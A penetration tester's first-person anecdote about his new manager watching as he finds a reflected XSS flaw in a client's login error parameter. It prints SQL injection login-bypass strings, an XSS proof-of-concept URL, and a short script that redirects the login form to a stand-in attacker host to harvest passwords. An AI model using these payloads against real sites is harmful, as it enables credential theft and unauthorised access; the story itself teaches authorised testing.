When Your Manager Watches You Work
Nathaniel Shere
Penetration Testing, Cybersecurity Consulting | Making the Internet safer one website at a time | DM me for security questions or inquiries
"Can I watch you work?"
It is one of the scariest questions that a manager can ask.
We were just leaving our daily meeting, and I was excited to start work on a fresh web application penetration test, when my new manager took me aside and broadsided me with that question. He was a good manager, but he had never done penetration testing before.
Run! Abort! Women and children first! I thought.
Sure! I said.
My natural fear was twofold.
First, real ethical hacking (or "penetration testing") is nothing like the hacking in movies or TV shows. There aren’t blinking firewall boxes that show a completion percentage for your hacking progress. There aren’t fancy, 3-D visual displays of hex data. Two people never type on the same keyboard while windows flash rapidly on and off the screen. And a special light doesn't turn on when malware activates.
In real life, ethical hacking is nine parts boring code review and parameter manipulation to one part exciting exploitation. Moreover, the "exciting exploitation" phase simply results in different text on your screen - no confetti or cheering throngs.
Second, I was concerned I wouldn't find any noteworthy vulnerabilities. And if that happened, would my less technical manager understand the hard work and advanced skills (humility is my strong suit) that went into the process, or would he focus more on the lack of interesting results?
But, what else could I have said?
So, we both walked back to my desk and made small talk while I set up my environment (opening BurpSuite, configuring log and save files, loading appropriate extensions, etc.).
Finally, I opened the target website and tried to set appropriate expectations with him about the upcoming test.
As it turns out, though, I shouldn't have bothered.
As with most website tests, I started at the login page. I wanted to see if I could bypass the login controls without valid credentials. So, I showed my manager how to test the login for classic SQL injection attacks by submitting username and password combinations with SQL query syntax.
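I don't remember the exact strings I submitted that day, but the classic starting points look something like this (illustrative payloads, not real credentials):

username: admin' --
password: ' OR '1'='1

If the query behind the login is built by pasting those values directly into the SQL string, the first payload can comment out the password check entirely, and the second can turn the WHERE clause into a condition that is always true.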
Nothing worked - no SQL injection vulnerability at the login.
However, while we tested, I noticed that the error message displayed on the login form ("Invalid Credentials") was taken straight from the URL. In other words, after a failed login, the URL in the browser bar would change to something like the following:
[domain].com/login?error=Invalid+Credentials
After we completed the SQL tests, I drew my manager's attention to this phenomenon. I showed him how changing the URL parameter resulted in a change in the resulting error message. He seemed a little confused, until I made the custom message below appear in big red letters at the top of the login form.
[domain].com/login?error=We+Need+More+Cowbell
"What does that do?" my manager asked. "Is that a vulnerability?"
Not yet, I explained. This is a common trick that developers use to allow arbitrary error messages down the road without needing to make a major code update. It is only a vulnerability if we can inject JavaScript into it.
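In templating terms, the pattern is roughly this - whatever arrives in the error parameter gets dropped straight into the page (an illustrative sketch, not the application's actual code; the {{ ... }} is just shorthand for "insert the parameter value here"):

<div class="error">{{ request.query.error }}</div>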
I showed him an example.
[domain].com/login?error=We+Need+More+Cowbell<script>alert('XSS')</script>
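The logic is simple: if the application echoes the parameter without HTML-encoding it, the page the browser receives would contain roughly the following, and the browser would treat the script tag as part of the page and execute it:

<div class="error">We Need More Cowbell<script>alert('XSS')</script></div>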
Having done scores of penetration tests by that point, I was accustomed to working for hours and chasing multiple false trails before finding a significant issue. So, I was as surprised as my manager when I submitted the URL above and a browser alert box appeared, displaying the message 'XSS' in big, bold letters.
"So, that's a vulnerability?" asked my manager excited.
Very much, I replied.
We quickly expanded the exploit. I showed my manager how I could write JavaScript code to change the target of the login form, thereby creating a malicious link. If I sent that link to another user of the system, with my injected code appropriately obfuscated using URL encoding, they would submit their login credentials on the legitimate website - but instead of sending their password to the system itself, they would send it to me. A simple redirect back to the original error message would hide my involvement, and the user would think they had just fat-fingered their password and try again.
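For the technically curious, the injected code was along these lines - a simplified sketch rather than the exact payload, with a made-up attacker URL, and URL-encoded before being folded into the link:

<script>
// Once the page loads, repoint the login form so submitted credentials
// go to a server the attacker controls (hypothetical URL)
window.addEventListener('load', function () {
  document.forms[0].action = 'https://attacker.example/collect';
});
</script>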
We were 10 minutes into testing.
I hadn't even logged into the system yet.
But, we had found a high-risk issue.
As I documented the finding, my manager wandered off - clearly impressed and excited to share the story of "our" finding.
Meanwhile, I dialed our client's number to inform them of the high-risk issue, thinking that I might need to set appropriate expectations with my manager again for next time.
Otherwise, he would walk away thinking that hacking is just like the movies.